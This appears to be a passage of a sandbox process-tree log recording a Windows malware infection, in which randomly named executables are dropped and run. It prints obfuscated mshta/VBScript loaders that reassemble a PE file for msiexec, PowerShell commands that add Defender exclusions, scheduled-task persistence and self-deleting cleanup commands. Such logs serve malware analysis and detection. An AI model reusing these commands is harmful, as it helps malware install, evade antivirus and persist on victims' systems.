                                                                                                      C:\Users\Admin\AppData\Local\Temp\ve0it4ml.zli\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet
                                                                                                      9⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:8828
                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ve0it4ml.zli\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ve0it4ml.zli\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843785 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"
                                                                                                        10⤵
                                                                                                          PID:7468
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dygz4bbc.mr0\GcleanerEU.exe /eufive & exit
                                                                                                      8⤵
                                                                                                        PID:8284
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\dygz4bbc.mr0\GcleanerEU.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\dygz4bbc.mr0\GcleanerEU.exe /eufive
                                                                                                          9⤵
                                                                                                            PID:8860
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zapb5pgm.eue\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                          8⤵
                                                                                                            PID:8384
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\zapb5pgm.eue\installer.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\zapb5pgm.eue\installer.exe /qn CAMPAIGN="654"
                                                                                                              9⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies system certificate store
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:8876
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4njb350.rtm\any.exe & exit
                                                                                                            8⤵
                                                                                                              PID:8668
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\y4njb350.rtm\any.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\y4njb350.rtm\any.exe
                                                                                                                9⤵
                                                                                                                  PID:8472
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkue5zjk.yt4\offer.exe & exit
                                                                                                                8⤵
                                                                                                                  PID:8964
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gkue5zjk.yt4\offer.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\gkue5zjk.yt4\offer.exe
                                                                                                                    9⤵
                                                                                                                      PID:2224
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"
                                                                                                                        10⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:6788
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 6788 & erase C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe & RD /S /Q C:\\ProgramData\\780705536108297\\* & exit
                                                                                                                          11⤵
                                                                                                                            PID:4968
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /pid 6788
                                                                                                                              12⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:8304
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"
                                                                                                                          10⤵
                                                                                                                            PID:6220
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com
                                                                                                                              11⤵
                                                                                                                                PID:5228
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com
                                                                                                                                11⤵
                                                                                                                                  PID:5944
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qryyj2oc.k0f\cust2.exe & exit
                                                                                                                            8⤵
                                                                                                                              PID:9064
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\qryyj2oc.k0f\cust2.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\qryyj2oc.k0f\cust2.exe
                                                                                                                                9⤵
                                                                                                                                  PID:2676
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wf23qq2w.3px\gcleaner.exe /mixfive & exit
                                                                                                                                8⤵
                                                                                                                                  PID:4172
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4996
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\wf23qq2w.3px\gcleaner.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\wf23qq2w.3px\gcleaner.exe /mixfive
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5192
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqb0eqy0.hvv\autosubplayer.exe /S & exit
                                                                                                                                  8⤵
                                                                                                                                    PID:8548
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zqb0eqy0.hvv\autosubplayer.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\zqb0eqy0.hvv\autosubplayer.exe /S
                                                                                                                                      9⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:8996
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso3198.tmp\tempfile.ps1"
                                                                                                                                        10⤵
                                                                                                                                          PID:7832
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kts5s5z.2bw\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                      8⤵
                                                                                                                                        PID:8740
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5kts5s5z.2bw\installer.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5kts5s5z.2bw\installer.exe /qn CAMPAIGN=654
                                                                                                                                          9⤵
                                                                                                                                            PID:7648
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\At0UWHx3CGPKiVSYcepb3zxg.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\At0UWHx3CGPKiVSYcepb3zxg.exe" silent
                                                                                                                                  4⤵
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:7720
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:6804
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:6796
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Xna5kxyyudg3tO5iXSiqTP5t.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Xna5kxyyudg3tO5iXSiqTP5t.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              • NTFS ADS
                                                                                                                              PID:4908
                                                                                                                              • C:\ProgramData\FRF97E75R0A3T7XJ.exe
                                                                                                                                "C:\ProgramData\FRF97E75R0A3T7XJ.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:6548
                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\ProgramData\FRF97E75R0A3T7XJ.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:2156
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Xna5kxyyudg3tO5iXSiqTP5t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\Xna5kxyyudg3tO5iXSiqTP5t.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    3⤵
                                                                                                                                      PID:6812
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im Xna5kxyyudg3tO5iXSiqTP5t.exe /f
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:7092
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        4⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5236
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\xFHwz5CKoaoLSn14v2gVuWtc.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\xFHwz5CKoaoLSn14v2gVuWtc.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:3364
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im xFHwz5CKoaoLSn14v2gVuWtc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\xFHwz5CKoaoLSn14v2gVuWtc.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      3⤵
                                                                                                                                        PID:6788
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im xFHwz5CKoaoLSn14v2gVuWtc.exe /f
                                                                                                                                          4⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3744
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          4⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3064
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\R1SENYhpul1b1V52g5dVfPwN.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\R1SENYhpul1b1V52g5dVfPwN.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:3940
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\R1SENYhpul1b1V52g5dVfPwN.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\R1SENYhpul1b1V52g5dVfPwN.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:2820
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\tZcERs8ASXPHcwQQ3YxiJEuL.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\tZcERs8ASXPHcwQQ3YxiJEuL.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:5048
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\VYCNML8o7HXkFUfK3F3saMBv.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\VYCNML8o7HXkFUfK3F3saMBv.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:964
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                        3⤵
                                                                                                                                          PID:6900
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                            4⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:7156
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\rjgGupDDBYCwvCwCARlnDFHP.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\rjgGupDDBYCwvCwCARlnDFHP.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5056
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\1eV3Bvt7hb7Yb_9wc93_xsZY.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\1eV3Bvt7hb7Yb_9wc93_xsZY.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:2392
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\5psJamFLpYzS4R9nE6A9JWby.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\5psJamFLpYzS4R9nE6A9JWby.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:5192
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\5psJamFLpYzS4R9nE6A9JWby.exe
                                                                                                                                            "5psJamFLpYzS4R9nE6A9JWby.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5472
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 144
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5552
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\U0asyGn64xNdUFzDWwPRDdIY.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\U0asyGn64xNdUFzDWwPRDdIY.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:5296
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Windows security modification
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • System policy modification
                                                                                                                                          PID:5440
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ac8de7f6-4387-4251-9d26-4649717f3e7d\AdvancedRun.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ac8de7f6-4387-4251-9d26-4649717f3e7d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ac8de7f6-4387-4251-9d26-4649717f3e7d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                            3⤵
                                                                                                                                              PID:1384
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ac8de7f6-4387-4251-9d26-4649717f3e7d\AdvancedRun.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ac8de7f6-4387-4251-9d26-4649717f3e7d\AdvancedRun.exe" /SpecialRun 4101d8 1384
                                                                                                                                                4⤵
                                                                                                                                                  PID:7064
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe" -Force
                                                                                                                                                3⤵
                                                                                                                                                  PID:4580
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe" -Force
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6532
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:640
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\HHUrIjijLOEZvfnPNjBenjYM.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3376
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Je3WKG2nFQ0G40veA5uWubSR.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Je3WKG2nFQ0G40veA5uWubSR.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5664
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\lYuQl7ZOfJGTwzEpJ_Sq7qmB.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\lYuQl7ZOfJGTwzEpJ_Sq7qmB.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:5984
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\tMYHl8w1YQrX72vMsaG8ROoR.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\tMYHl8w1YQrX72vMsaG8ROoR.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:5204
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\d4U8Gp5t70ICeEBumzWQHkug.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\d4U8Gp5t70ICeEBumzWQHkug.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4116
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 660
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:5532
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 672
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3620
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 676
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:948
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 680
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Program crash
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3440
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1128
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:6720
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1188
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:6656
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1200
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:4796
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1276
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3756
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 1268
                                                                                                                                                        3⤵
                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:1584
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\d1rbmwqJijmTqkou77TdTKZd.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\d1rbmwqJijmTqkou77TdTKZd.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:2100
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\BYVkduKsQJAFrRNhrJjHW1L6.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\BYVkduKsQJAFrRNhrJjHW1L6.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4956
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1548
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                                        3⤵
                                                                                                                                                          PID:940
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\_xIQPTSCpFdnogyldOAwhqOD.exe" ) do taskkill -iM "%~NXI" -f
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5292
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
                                                                                                                                                                ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7004
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4432
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:7144
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:7328
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7924
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:8148
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:8172
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    msiexec.exe /Y ..\bjUC.l
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:6316
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill -iM "_xIQPTSCpFdnogyldOAwhqOD.exe" -f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:1780
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\dB3DkcYnouct3pjHvUqo8N60.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\dB3DkcYnouct3pjHvUqo8N60.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:4412
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          PID:6088
